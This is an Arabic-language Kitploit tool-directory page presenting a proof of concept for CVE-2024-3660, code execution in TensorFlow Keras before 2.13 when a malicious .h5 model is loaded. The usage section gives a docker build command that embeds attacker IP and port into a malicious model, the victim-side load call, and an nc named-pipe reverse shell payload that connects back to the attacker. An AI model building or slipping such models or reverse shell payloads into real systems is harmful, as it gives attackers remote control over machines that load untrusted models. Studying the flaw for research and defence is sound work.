Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3660-PoC — إثبات مفهوم لثغرة CVE-2024-3660. تنفيذ كود تعسفي في Keras. | Kitploit
أدوات/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقتطوير الحمولاتأمن الذكاء الاصطناعياستغلال الملفات الثنائية
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

إثبات مفهوم لثغرة CVE-2024-3660. تنفيذ كود تعسفي في Keras.

عرض المستودع
41منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3660 – تنفيذ كود تعسفي في TensorFlow Keras عبر نموذج خبيث

نظرة عامة

CVE-2024-3660 هو ثغرة تنفيذ كود تعسفي في إطار عمل Keras الخاص بـ TensorFlow، ويؤثر على الإصدارات < 2.13.
تسمح للمهاجم بتضمين كود Python داخل النموذج (على سبيل المثال، عبر طبقة Lambda) والذي يتم تنفيذه تلقائيًا عند تحميل النموذج.

عند تحميل ملف نموذج .h5 خبيث في بيئة معرّضة للخطر، يتم تنفيذ أوامر تعسفية بنفس صلاحيات العملية التي تقوم بالتحميل.


الإصدارات المتأثرة

  • Keras التابع لـ TensorFlow < 2.13.0
  • نماذج Keras التي يتم تحميلها عبر:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

أو في إصدارات TensorFlow الأقدم حيث لا تكون safe_mode مفعّلة افتراضيًا.

وصف إثبات المفهوم (PoC)

يستخدم إثبات المفهوم هذا بناءً قائمًا على Docker لتوليد نموذج hack.h5 خبيث يحتوي على حمولة reverse shell. عند تحميل النموذج في إصدار TensorFlow معرّض للخطر، فإنه يتصل مجددًا بجهاز المهاجم.

الاستخدام

1. بناء النموذج الخبيث واستخراجه

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. تحميل النموذج الخبيث (جانب الضحية)

  • في بيئة TensorFlow معرّضة للخطر (< 2.13):
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

الحمولة

  • تستخدم الحمولة المضمّنة أداة nc لإنشاء reverse shell:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

المراجع

NVD CMU Oligo Secuirty

تنزيل الأداة